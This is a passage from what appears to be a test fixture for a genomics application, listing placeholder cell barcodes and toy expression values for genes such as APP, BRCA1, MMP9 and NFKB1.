"FoobarAB4_BazMoo_2DDCCACACDBBACCC-1",
"FoobarAB8_BazMoo_7DADCDCBCDDBDDDA-1",
"FoobarAB5_BazMoo_6ABBBBCBCBCBBCAB-1",
"FoobarAB6_BazMoo_6CACDAABBDDBCBDA-1",
"FoobarAB5_BazMoo_8BACBBADCBDDBDAA-1",
"FoobarAB2_BazMoo_5ADDADBBABBDCCAC-1",
"FoobarAB6_BazMoo_1DCACCBBDBBBBCBB-1",
"FoobarAB1_BazMoo_8CBDADBABACDADAC-1",
"FoobarAB4_BazMoo_6ADADABCCDDBDACC-1",
"FoobarAB7_BazMoo_1BBADABCABACDADC-1",
"FoobarAB5_BazMoo_6DBCBCDABBADCCCB-1",
"FoobarAB3_BazMoo_8AAABDDBDDCBDDAB-1",
"FoobarAB5_BazMoo_2DDBCCDBADBADCBC-1",
"FoobarAB4_BazMoo_1ABBDBDDDCBABACB-1",
"FoobarAB5_BazMoo_7DABADCCDABDBAAB-1",
"FoobarAB5_BazMoo_1DDDDBBDAADDABCB-1",
"FoobarAB3_BazMoo_3BBCCDBADBABBDCA-1",
"FoobarAB7_BazMoo_7BCABCCCACBAADDC-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"APP Expression": {
"name": "APP Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
1.0,
2.32,
1.0,
2.32,
2.81,
1.0,
2.0,
2.81,
3.0,
2.81,
1.0,
2.81,
1.58,
2.0,
1.58,
3.0,
1.58,
1.58,
2.81,
2.32,
2.32,
3.0,
1.58,
2.58,
2.58,
1.0,
2.81,
3.0,
1.0,
1.0,
1.0,
2.58,
2.32,
1.58,
2.58,
2.32,
3.0,
2.81,
1.58,
3.0,
1.58,
2.32,
2.32,
2.81,
2.0,
1.0,
2.32,
1.58,
3.0,
1.0,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"BRCA1 Cells": {
"name": "BRCA1 Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB4_BazMoo_6ABAADADBBCAABDA-1",
"FoobarAB8_BazMoo_1BDACCDCCBBADBCB-1",
"FoobarAB2_BazMoo_8DDACDAABBBBACDD-1",
"FoobarAB2_BazMoo_1CADBDBABCABBDDD-1",
"FoobarAB2_BazMoo_6ABBADACDCDDBCAC-1",
"FoobarAB7_BazMoo_7AADDADDDCADABDD-1",
"FoobarAB4_BazMoo_3ABCCABBCCCCBCDB-1",
"FoobarAB7_BazMoo_4ABDBBBACBCCBDAA-1",
"FoobarAB4_BazMoo_2ACAADBCBDDADADB-1",
"FoobarAB2_BazMoo_2DDCCBAACDCCADBB-1",
"FoobarAB3_BazMoo_3CBBDAAACACCDDDA-1",
"FoobarAB7_BazMoo_5CCCBCDAABDBABAD-1",
"FoobarAB5_BazMoo_3CBDBBABBAACABCD-1",
"FoobarAB8_BazMoo_5CDDADACBAAACBAA-1",
"FoobarAB7_BazMoo_6CBBDBBCBCBDABAA-1",
"FoobarAB8_BazMoo_2CACAACCDBBBBBBB-1",
"FoobarAB7_BazMoo_4DDDDDBCCCBBADBD-1",
"FoobarAB1_BazMoo_1DADCCBAAACBDABC-1",
"FoobarAB4_BazMoo_8DCDBDACADABCDDB-1",
"FoobarAB1_BazMoo_1DACACBDDADCCACC-1",
"FoobarAB6_BazMoo_1BCDADDDABDDBCDA-1",
"FoobarAB7_BazMoo_7ACADCDBAABAACBD-1",
"FoobarAB8_BazMoo_2CCBCCBACABACCAB-1",
"FoobarAB1_BazMoo_8CBBADABBCDAAAAA-1",
"FoobarAB6_BazMoo_1BDCADABBAACBCCD-1",
"FoobarAB8_BazMoo_6DBAADCBDADCCDDB-1",
"FoobarAB4_BazMoo_3BCADDCAAACBADBC-1",
"FoobarAB3_BazMoo_4CABACABDCCCADCA-1",
"FoobarAB8_BazMoo_3DACBBDDBABDDDDD-1",
"FoobarAB8_BazMoo_5DADAAABCBADCDCC-1",
"FoobarAB4_BazMoo_1DCDCCCDBDBBABBB-1",
"FoobarAB1_BazMoo_5DADBADCDDCBDAAB-1",
"FoobarAB5_BazMoo_2ACDDDDADBCDDDCA-1",
"FoobarAB7_BazMoo_2BACDBDDBCACABDD-1",
"FoobarAB2_BazMoo_5DBCDDBABCAAADDB-1",
"FoobarAB3_BazMoo_3DABBDCBDACACCCC-1",
"FoobarAB6_BazMoo_1DBBAADCDAADBCDC-1",
"FoobarAB7_BazMoo_2ACCDBBADCDCACAB-1",
"FoobarAB5_BazMoo_7BAACDCDCBCBBACA-1",
"FoobarAB7_BazMoo_5DCDDDDABACBDACA-1",
"FoobarAB4_BazMoo_5CDCCABBCBACCCBC-1",
"FoobarAB5_BazMoo_1DDDDBBDAADDABCB-1",
"FoobarAB5_BazMoo_8DDCCCBABCBACABB-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"BRCA1 Expression": {
"name": "BRCA1 Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
3.0,
1.0,
2.0,
2.81,
2.81,
2.0,
1.0,
2.0,
2.32,
2.0,
1.0,
1.58,
2.0,
1.58,
1.58,
2.0,
1.58,
3.0,
2.0,
1.58,
2.58,
3.0,
2.81,
2.81,
1.58,
2.58,
3.0,
2.81,
2.0,
1.58,
2.0,
2.0,
2.58,
3.0,
2.0,
2.81,
2.0,
2.32,
1.58,
2.81,
2.32,
2.58,
1.58,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"MMP9 Cells": {
"name": "MMP9 Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB8_BazMoo_7ADDDBCAAAADBCAB-1",
"FoobarAB2_BazMoo_3BBCBAABCDAACADD-1",
"FoobarAB2_BazMoo_8BDBABBACDCCDDBD-1",
"FoobarAB3_BazMoo_1DABABDBDCCDBCBA-1",
"FoobarAB6_BazMoo_7CBBCDBADBBBABDA-1",
"FoobarAB5_BazMoo_3CBBBDBACDBABBCA-1",
"FoobarAB2_BazMoo_1AADDCCADACBADAD-1",
"FoobarAB7_BazMoo_5BADDCDBCDDBCDAA-1",
"FoobarAB4_BazMoo_6CADCBCCBCDACDBD-1",
"FoobarAB3_BazMoo_8CDCBBDBCDBBDBCA-1",
"FoobarAB3_BazMoo_7DCACACACDCADCBD-1",
"FoobarAB2_BazMoo_2DDCCBAACDCCADBB-1",
"FoobarAB3_BazMoo_3CBBDAAACACCDDDA-1",
"FoobarAB7_BazMoo_3ACBCBCACACDBADD-1",
"FoobarAB5_BazMoo_3BDBBDDDDDBBABAC-1",
"FoobarAB3_BazMoo_7BCABDBCDBABBCBA-1",
"FoobarAB8_BazMoo_8ADAABACBACDDCAB-1",
"FoobarAB3_BazMoo_5DAAABCBCADBBCCC-1",
"FoobarAB4_BazMoo_4DDBADBCBACBDCDA-1",
"FoobarAB7_BazMoo_4DDDDDBCCCBBADBD-1",
"FoobarAB3_BazMoo_1DBABCBBAABBABBB-1",
"FoobarAB2_BazMoo_1DDDBDCCBCBCACAA-1",
"FoobarAB4_BazMoo_6DDACDDBBBAADBCC-1",
"FoobarAB5_BazMoo_3BADAABBDABABDAC-1",
"FoobarAB1_BazMoo_1DACACBDDADCCACC-1",
"FoobarAB7_BazMoo_8DCBCBBACADBBBAC-1",
"FoobarAB5_BazMoo_3CDAABAABBACAAAC-1",
"FoobarAB4_BazMoo_1BCDCDADBDBCBDAD-1",
"FoobarAB2_BazMoo_1ACCDADBABBACBCA-1",
"FoobarAB1_BazMoo_5BCAAACBABBCDBDC-1",
"FoobarAB3_BazMoo_8BCDBDDBDBDBDCBC-1",
"FoobarAB5_BazMoo_1DCBBBBDACADABAA-1",
"FoobarAB2_BazMoo_8CCACCBDCBCDABAD-1",
"FoobarAB1_BazMoo_3BBCCABDADCDBCCB-1",
"FoobarAB4_BazMoo_7DDBDCACBACDBAAC-1",
"FoobarAB3_BazMoo_6BACBCBCDAADDDAC-1",
"FoobarAB7_BazMoo_5DAADBACDAADAABB-1",
"FoobarAB3_BazMoo_4CACCAABBDCDBACD-1",
"FoobarAB5_BazMoo_8CCBBABDDADBBACD-1",
"FoobarAB4_BazMoo_5CAADDAABBADCDCD-1",
"FoobarAB3_BazMoo_2DACDBDCAAAAACBB-1",
"FoobarAB7_BazMoo_2BACDBDDBCACABDD-1",
"FoobarAB8_BazMoo_1CBBCDBACADDAABB-1",
"FoobarAB1_BazMoo_5AABDACBCCBCABDD-1",
"FoobarAB4_BazMoo_2CCACBADCCCCABAD-1",
"FoobarAB1_BazMoo_8DDCCAABADABCACC-1",
"FoobarAB1_BazMoo_4DDDCDCCABBDDABD-1",
"FoobarAB5_BazMoo_7BAACDCDCBCBBACA-1",
"FoobarAB5_BazMoo_7DABADCCDABDBAAB-1",
"FoobarAB5_BazMoo_1DDDDBBDAADDABCB-1",
"FoobarAB8_BazMoo_5CBCADBCADABBCAB-1",
"FoobarAB6_BazMoo_4DAACBADBACABADC-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"MMP9 Expression": {
"name": "MMP9 Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
3.0,
1.0,
1.58,
2.32,
1.58,
3.0,
2.81,
1.58,
2.32,
2.0,
2.0,
1.58,
1.0,
2.32,
2.0,
2.81,
2.58,
1.58,
1.0,
3.0,
1.0,
2.81,
2.58,
2.58,
2.81,
2.0,
2.32,
1.0,
2.81,
1.0,
1.58,
2.58,
1.58,
1.0,
1.0,
2.32,
2.32,
3.0,
1.58,
1.58,
2.0,
2.81,
3.0,
1.58,
3.0,
2.0,
2.32,
2.58,
2.32,
2.0,
2.81,
3.0,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"HLA-DRB1 Cells": {
"name": "HLA-DRB1 Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB4_BazMoo_6ABAADADBBCAABDA-1",
"FoobarAB5_BazMoo_4BAABBACBDADDACA-1",
"FoobarAB5_BazMoo_7DCACDAACCACBBBD-1",
"FoobarAB8_BazMoo_4BDABCDCCBABACCC-1",
"FoobarAB2_BazMoo_8BDBABBACDCCDDBD-1",
"FoobarAB8_BazMoo_4CDBCDACADDDCABA-1",
"FoobarAB4_BazMoo_2ACAADBCBDDADADB-1",
"FoobarAB3_BazMoo_8CDCBBDBCDBBDBCA-1",
"FoobarAB2_BazMoo_8DDABDBCDABBBDAA-1",
"FoobarAB7_BazMoo_5CBDCCDBCDBCDCCC-1",
"FoobarAB3_BazMoo_5CAADCDABADACAAC-1",
"FoobarAB4_BazMoo_2BBDBCACBADBDDBA-1",
"FoobarAB8_BazMoo_6CADDCBBACDDBACB-1",
"FoobarAB1_BazMoo_3BCBBBCBCDDCBDAB-1",
"FoobarAB3_BazMoo_7BCABDBCDBABBCBA-1",
"FoobarAB8_BazMoo_7DDBCBACABDABBAA-1",
"FoobarAB6_BazMoo_4DBCDDBAAAACAADC-1",
"FoobarAB5_BazMoo_5BBDADCDDCCABBDA-1",
"FoobarAB8_BazMoo_4BDDDDBCBCAABDDD-1",
"FoobarAB7_BazMoo_4DDDDDBCCCBBADBD-1",
"FoobarAB3_BazMoo_1DBABCBBAABBABBB-1",
"FoobarAB3_BazMoo_5ACABCDCBDAAACAD-1",
"FoobarAB1_BazMoo_6BADACADACADCDDD-1",
"FoobarAB8_BazMoo_6BCCBDBADAABDCCD-1",
"FoobarAB6_BazMoo_2CCACBBAAACCAACA-1",
"FoobarAB7_BazMoo_2BCBBBBCBCAAABDD-1",
"FoobarAB3_BazMoo_4CACCAABBDCDBACD-1",
"FoobarAB8_BazMoo_6DBAADCBDADCCDDB-1",
"FoobarAB7_BazMoo_5DBABDCBDCBADBCA-1",
"FoobarAB8_BazMoo_2CCBABBDDADCCDBD-1",
"FoobarAB3_BazMoo_2DACDBDCAAAAACBB-1",
"FoobarAB4_BazMoo_2DDCCACACDBBACCC-1",
"FoobarAB5_BazMoo_6ABBBBCBCBCBBCAB-1",
"FoobarAB3_BazMoo_2ADDBAAACCDDDDAA-1",
"FoobarAB4_BazMoo_6ADADABCCDDBDACC-1",
"FoobarAB8_BazMoo_4BCABBACDAACCBCA-1",
"FoobarAB3_BazMoo_6DDAABBCDBABACAA-1",
"FoobarAB8_BazMoo_2CADDACABACDAADD-1",
"FoobarAB1_BazMoo_4DDDCDCCABBDDABD-1",
"FoobarAB5_BazMoo_2DDBCCDBADBADCBC-1",
"FoobarAB4_BazMoo_1ABBDBDDDCBABACB-1",
"FoobarAB6_BazMoo_4DAACBADBACABADC-1",
"FoobarAB3_BazMoo_8BDCBCBDCABACCCB-1",
"FoobarAB7_BazMoo_7BCABCCCACBAADDC-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"HLA-DRB1 Expression": {
"name": "HLA-DRB1 Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
1.0,
2.32,
2.32,
2.58,
2.0,
1.0,
2.58,
1.58,
2.0,
1.58,
2.58,
2.58,
1.0,
2.81,
1.0,
1.0,
2.81,
2.32,
2.0,
2.32,
1.0,
2.81,
2.58,
1.58,
1.58,
2.32,
1.0,
2.81,
2.0,
2.32,
2.32,
1.58,
2.81,
2.58,
1.0,
2.32,
2.58,
2.58,
1.58,
2.58,
2.81,
1.58,
2.0,
2.32,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"ADIPOQ Cells": {
"name": "ADIPOQ Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB4_BazMoo_5ABCBACBDABBADAC-1",
"FoobarAB4_BazMoo_2DABDACBCCCCADBC-1",
"FoobarAB5_BazMoo_5BBDADACAABADAAB-1",
"FoobarAB8_BazMoo_7ADDDBCAAAADBCAB-1",
"FoobarAB5_BazMoo_7DCACDAACCACBBBD-1",
"FoobarAB6_BazMoo_4CBDCBCDACADDDDA-1",
"FoobarAB3_BazMoo_8ADDBCBACDCCACCD-1",
"FoobarAB2_BazMoo_3DDDDDBCAAAABCBA-1",
"FoobarAB8_BazMoo_4CDBCDACADDDCABA-1",
"FoobarAB7_BazMoo_2CADCDBBDBBDDCBA-1",
"FoobarAB7_BazMoo_4ABDBBBACBCCBDAA-1",
"FoobarAB3_BazMoo_8CDCBBDBCDBBDBCA-1",
"FoobarAB8_BazMoo_8CDBBCCBBAADAAAC-1",
"FoobarAB1_BazMoo_8DCCDCBDADCCAACD-1",
"FoobarAB4_BazMoo_6CBCDABADDDDCBDD-1",
"FoobarAB8_BazMoo_1CBADADCCCCACAAC-1",
"FoobarAB3_BazMoo_7BCABDBCDBABBCBA-1",
"FoobarAB8_BazMoo_7DDBCBACABDABBAA-1",
"FoobarAB3_BazMoo_5DAAABCBCADBBCCC-1",
"FoobarAB4_BazMoo_1ABABBCCADCADBAB-1",
"FoobarAB5_BazMoo_5BBDADCDDCCABBDA-1",
"FoobarAB3_BazMoo_1DBABCBBAABBABBB-1",
"FoobarAB4_BazMoo_6DDACDDBBBAADBCC-1",
"FoobarAB1_BazMoo_6BADACADACADCDDD-1",
"FoobarAB2_BazMoo_8DBCDDCCAACDDDCB-1",
"FoobarAB8_BazMoo_2CCBCCBACABACCAB-1",
"FoobarAB6_BazMoo_2CCACBBAAACCAACA-1",
"FoobarAB6_BazMoo_6DCADBCABDDCCAAA-1",
"FoobarAB1_BazMoo_3BDCBBDBACBABCCB-1",
"FoobarAB3_BazMoo_6BACBCBCDAADDDAC-1",
"FoobarAB3_BazMoo_4CACCAABBDCDBACD-1",
"FoobarAB3_BazMoo_4BBBAABCBAACCBAC-1",
"FoobarAB6_BazMoo_8DCBCBCBCDCBADBA-1",
"FoobarAB1_BazMoo_5DADBADCDDCBDAAB-1",
"FoobarAB5_BazMoo_6ABBBBCBCBCBBCAB-1",
"FoobarAB6_BazMoo_1DCACCBBDBBBBCBB-1",
"FoobarAB2_BazMoo_5DCCBDBABBDACAAB-1",
"FoobarAB2_BazMoo_1CABADDBCABBCBBA-1",
"FoobarAB8_BazMoo_7DCADDBDCBABCBCA-1",
"FoobarAB2_BazMoo_7DABDADBDBADACDB-1",
"FoobarAB5_BazMoo_2DDBCCDBADBADCBC-1",
"FoobarAB4_BazMoo_1ABBDBDDDCBABACB-1",
"FoobarAB5_BazMoo_7DABADCCDABDBAAB-1",
"FoobarAB7_BazMoo_3DDCCDCCDDBBAADB-1",
"FoobarAB5_BazMoo_8DDCCCBABCBACABB-1",
"FoobarAB7_BazMoo_7BCABCCCACBAADDC-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"ADIPOQ Expression": {
"name": "ADIPOQ Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
2.0,
2.0,
2.32,
2.58,
2.0,
2.81,
2.58,
2.0,
2.81,
2.58,
1.0,
2.32,
2.0,
2.58,
2.58,
2.0,
3.0,
3.0,
1.58,
1.58,
1.0,
1.58,
1.0,
2.0,
1.58,
3.0,
2.0,
2.81,
2.81,
1.58,
2.0,
2.0,
1.58,
2.81,
2.58,
2.0,
2.58,
3.0,
2.32,
1.0,
1.0,
1.58,
3.0,
2.32,
3.0,
2.0,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"ABCB1 Cells": {
"name": "ABCB1 Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB4_BazMoo_2DABDACBCCCCADBC-1",
"FoobarAB5_BazMoo_4BAABBACBDADDACA-1",
"FoobarAB5_BazMoo_7DCACDAACCACBBBD-1",
"FoobarAB1_BazMoo_1BBDDDBDADDCACAB-1",
"FoobarAB6_BazMoo_4CBDCBCDACADDDDA-1",
"FoobarAB2_BazMoo_1CADBDBABCABBDDD-1",
"FoobarAB2_BazMoo_3DDDDDBCAAAABCBA-1",
"FoobarAB4_BazMoo_8DBCCDADBCBBCBDD-1",
"FoobarAB6_BazMoo_3BADDCCDACDAAAAD-1",
"FoobarAB6_BazMoo_2DDDCABCCCDBDDAC-1",
"FoobarAB7_BazMoo_5BADDCDBCDDBCDAA-1",
"FoobarAB3_BazMoo_3CBBDAAACACCDDDA-1",
"FoobarAB5_BazMoo_3CBDBBABBAACABCD-1",
"FoobarAB2_BazMoo_8DDABDBCDABBBDAA-1",
"FoobarAB2_BazMoo_2DCDCDBCBABDBBAD-1",
"FoobarAB4_BazMoo_3BBADCDAABADCAAB-1",
"FoobarAB8_BazMoo_5CDDADACBAAACBAA-1",
"FoobarAB4_BazMoo_2BBDBCACBADBDDBA-1",
"FoobarAB8_BazMoo_1CBADADCCCCACAAC-1",
"FoobarAB6_BazMoo_4DBCDDBAAAACAADC-1",
"FoobarAB5_BazMoo_5BBDADCDDCCABBDA-1",
"FoobarAB8_BazMoo_4BDDDDBCBCAABDDD-1",
"FoobarAB2_BazMoo_4ACDCCACDDBADADC-1",
"FoobarAB3_BazMoo_2CDDDCADDBDBDABB-1",
"FoobarAB3_BazMoo_8BCDBDDBDBDBDCBC-1",
"FoobarAB1_BazMoo_7BDCABCBDAADCBBA-1",
"FoobarAB4_BazMoo_6ABCCABADCCDBCAA-1",
"FoobarAB7_BazMoo_5DAADBACDAADAABB-1",
"FoobarAB6_BazMoo_1BDCADABBAACBCCD-1",
"FoobarAB5_BazMoo_8CCBBABDDADBBACD-1",
"FoobarAB8_BazMoo_5DADAAABCBADCDCC-1",
"FoobarAB5_BazMoo_2ACDDDDADBCDDDCA-1",
"FoobarAB7_BazMoo_2BACDBDDBCACABDD-1",
"FoobarAB2_BazMoo_5DCCBDBABBDACAAB-1",
"FoobarAB4_BazMoo_2CCACBADCCCCABAD-1",
"FoobarAB6_BazMoo_1DBBAADCDAADBCDC-1",
"FoobarAB8_BazMoo_2CADDACABACDAADD-1",
"FoobarAB2_BazMoo_1CCCBADCABBDBDAC-1",
"FoobarAB5_BazMoo_7BAACDCDCBCBBACA-1",
"FoobarAB4_BazMoo_5CDCCABBCBACCCBC-1",
"FoobarAB6_BazMoo_4DAACBADBACABADC-1",
"FoobarAB3_BazMoo_4CAAACBDCBCBBBCA-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"ABCB1 Expression": {
"name": "ABCB1 Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
3.0,
1.0,
1.0,
2.0,
2.0,
2.81,
2.0,
2.58,
2.81,
1.0,
3.0,
2.0,
2.81,
2.32,
2.58,
1.0,
2.58,
1.0,
2.58,
2.81,
1.58,
2.32,
2.32,
1.58,
2.58,
1.58,
1.0,
3.0,
3.0,
3.0,
2.32,
2.81,
1.0,
1.58,
2.58,
2.32,
2.32,
2.0,
2.81,
3.0,
1.0,
3.0,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"LOC110806262 Cells": {
"name": "LOC110806262 Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB5_BazMoo_5BBDADACAABADAAB-1",
"FoobarAB3_BazMoo_6AACDDCDACBCBACD-1",
"FoobarAB7_BazMoo_3ADABDACCCABBCBC-1",
"FoobarAB7_BazMoo_1DBAACCBDDDCBCDB-1",
"FoobarAB4_BazMoo_8DBCCDADBCBBCBDD-1",
"FoobarAB5_BazMoo_8DCCCBAABDDBDDDA-1",
"FoobarAB5_BazMoo_3CBBBDBACDBABBCA-1",
"FoobarAB4_BazMoo_2ACAADBCBDDADADB-1",
"FoobarAB8_BazMoo_7CCACACCBDDBBCBB-1",
"FoobarAB3_BazMoo_7DCACACACDCADCBD-1",
"FoobarAB1_BazMoo_8CDCBDACDAAACBBD-1",
"FoobarAB8_BazMoo_4CBABCDBBDBCBCCA-1",
"FoobarAB8_BazMoo_6BABCBBCDBBCACDD-1",
"FoobarAB7_BazMoo_5CCCBCDAABDBABAD-1",
"FoobarAB3_BazMoo_5CAADCDABADACAAC-1",
"FoobarAB4_BazMoo_2BBDBCACBADBDDBA-1",
"FoobarAB8_BazMoo_6CADDCBBACDDBACB-1",
"FoobarAB7_BazMoo_4CDBBCDDDDAADCDC-1",
"FoobarAB8_BazMoo_7DDBCBACABDABBAA-1",
"FoobarAB5_BazMoo_6AABBDADDABCDDCD-1",
"FoobarAB3_BazMoo_3BDBDACADBAADCCC-1",
"FoobarAB6_BazMoo_7BDAABDCAADADBBA-1",
"FoobarAB3_BazMoo_5DAAABCBCADBBCCC-1",
"FoobarAB8_BazMoo_8DCDABCAADDBAABC-1",
"FoobarAB6_BazMoo_4DBCDDCADAACCCDD-1",
"FoobarAB5_BazMoo_5BBDADCDDCCABBDA-1",
"FoobarAB2_BazMoo_7DCAAACADCCADBAD-1",
"FoobarAB7_BazMoo_5ADBBAAABBCCBABB-1",
"FoobarAB7_BazMoo_8DACBBCACDACDCBA-1",
"FoobarAB2_BazMoo_1ABCCACACBBBCDBA-1",
"FoobarAB5_BazMoo_6BCBABACCCDACDBB-1",
"FoobarAB5_BazMoo_5CADADBDBDDCCADD-1",
"FoobarAB4_BazMoo_1BCDCDADBDBCBDAD-1",
"FoobarAB2_BazMoo_1ACCDADBABBACBCA-1",
"FoobarAB3_BazMoo_2CDDDCADDBDBDABB-1",
"FoobarAB1_BazMoo_8CBBADABBCDAAAAA-1",
"FoobarAB7_BazMoo_8BDCDBABDCCCBDDC-1",
"FoobarAB1_BazMoo_3BBCCABDADCDBCCB-1",
"FoobarAB4_BazMoo_6ABCCABADCCDBCAA-1",
"FoobarAB2_BazMoo_6BACDBCDDCCDADAB-1",
"FoobarAB3_BazMoo_2DBCBBDABAADBDCD-1",
"FoobarAB3_BazMoo_4CABACABDCCCADCA-1",
"FoobarAB8_BazMoo_3DACBBDDBABDDDDD-1",
"FoobarAB5_BazMoo_8BACBBADCBDDBDAA-1",
"FoobarAB8_BazMoo_1CBBCDBACADDAABB-1",
"FoobarAB4_BazMoo_2CCACBADCCCCABAD-1",
"FoobarAB2_BazMoo_1CCCBADCABBDBDAC-1",
"FoobarAB7_BazMoo_2ACCDBBADCDCACAB-1",
"FoobarAB7_BazMoo_5DCDDDDABACBDACA-1",
"FoobarAB5_BazMoo_7DABADCCDABDBAAB-1",
"FoobarAB7_BazMoo_7BCABCCCACBAADDC-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"LOC110806262 Expression": {
"name": "LOC110806262 Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
2.58,
1.58,
2.81,
2.0,
2.58,
2.58,
1.0,
2.58,
2.0,
1.58,
3.0,
2.58,
2.32,
2.32,
1.58,
1.58,
1.0,
2.81,
3.0,
2.81,
2.81,
3.0,
3.0,
2.0,
1.58,
1.58,
2.32,
2.32,
2.32,
2.81,
2.32,
2.81,
2.58,
2.32,
2.0,
1.58,
1.0,
1.0,
2.58,
2.32,
2.58,
2.58,
1.58,
3.0,
2.0,
3.0,
2.81,
1.58,
2.0,
2.81,
2.58,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"NFKB1 Cells": {
"name": "NFKB1 Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB6_BazMoo_2ACBDBBABABABACC-1",
"FoobarAB5_BazMoo_5BBDADACAABADAAB-1",
"FoobarAB2_BazMoo_3BBCBAABCDAACADD-1",
"FoobarAB3_BazMoo_8BABABDBACACACCD-1",
"FoobarAB5_BazMoo_7DCACDAACCACBBBD-1",
"FoobarAB3_BazMoo_7ACACAAADCCDBADA-1",
"FoobarAB7_BazMoo_4ADBADDCDCCADBDC-1",
"FoobarAB2_BazMoo_3DDDDDBCAAAABCBA-1",
"FoobarAB8_BazMoo_4BDABCDCCBABACCC-1",
"FoobarAB3_BazMoo_1DABABDBDCCDBCBA-1",
"FoobarAB6_BazMoo_1ACCBABCADDCBAAC-1",
"FoobarAB7_BazMoo_6ABADABDAABBCDDB-1",
"FoobarAB6_BazMoo_2DDDCABCCCDBDDAC-1",
"FoobarAB5_BazMoo_8BAADDAAACABBCBD-1",
"FoobarAB5_BazMoo_1CACBDACACDDCCDD-1",
"FoobarAB8_BazMoo_7CCACACCBDDBBCBB-1",
"FoobarAB3_BazMoo_2DACADABBDACCBDC-1",
"FoobarAB8_BazMoo_3CBCBADCDDBBBABA-1",
"FoobarAB4_BazMoo_3BBADCDAABADCAAB-1",
"FoobarAB8_BazMoo_5CDDADACBAAACBAA-1",
"FoobarAB1_BazMoo_1CDBDADAAACBAABD-1",
"FoobarAB3_BazMoo_7BCABDBCDBABBCBA-1",
"FoobarAB8_BazMoo_7DDBCBACABDABBAA-1",
"FoobarAB2_BazMoo_1DDBAACABBACBDCA-1",
"FoobarAB5_BazMoo_8ABDADBBCADAABDD-1",
"FoobarAB6_BazMoo_7BDAABDCAADADBBA-1",
"FoobarAB6_BazMoo_4DBCDDCADAACCCDD-1",
"FoobarAB4_BazMoo_1ABABBCCADCADBAB-1",
"FoobarAB8_BazMoo_4BADABCDBDBDACAB-1",
"FoobarAB8_BazMoo_2CACAACCDBBBBBBB-1",
"FoobarAB8_BazMoo_7CBCDDADACDDACAA-1",
"FoobarAB1_BazMoo_1DADCCBAAACBDABC-1",
"FoobarAB7_BazMoo_8DACBBCACDACDCBA-1",
"FoobarAB5_BazMoo_3BADAABBDABABDAC-1",
"FoobarAB2_BazMoo_1ABCCACACBBBCDBA-1",
"FoobarAB3_BazMoo_1DBADBBCAACCBDDC-1",
